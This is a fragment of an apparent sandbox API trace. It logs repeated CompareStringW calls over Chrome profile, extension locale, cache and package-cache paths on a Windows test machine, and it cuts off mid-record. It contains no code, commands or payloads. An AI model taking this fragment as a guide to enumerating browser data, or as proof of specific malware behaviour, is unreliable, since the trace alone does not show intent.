returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount2=130) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount2=130) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=118, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount2=130) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount2=130) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount2=130) returned 1 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount2=130) returned 3 [0276.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\", cchCount2=130) returned 3 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\", cchCount2=130) returned 3 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\", cchCount2=130) returned 3 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=68, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount2=84) returned 3 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount2=84) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount2=84) returned 3 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount2=84) returned 3 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount2=130) returned 3 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\", cchCount2=132) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\", cchCount2=132) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\", cchCount2=132) returned 3 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\", cchCount2=132) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\", cchCount2=130) returned 1 [0276.417] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", cchCount2=133) returned 3 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", cchCount2=133) returned 1 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=118, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount2=116) returned 3 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount2=116) returned 3 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=118, lpString2="C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount2=116) returned 1 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=68, lpString2="C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount2=116) returned 3 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", cchCount2=130) returned 3 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", cchCount2=130) returned 1 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", cchCount2=130) returned 3 [0276.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount2=130) returned 3 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\", cchCount2=130) returned 1 [0276.419] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 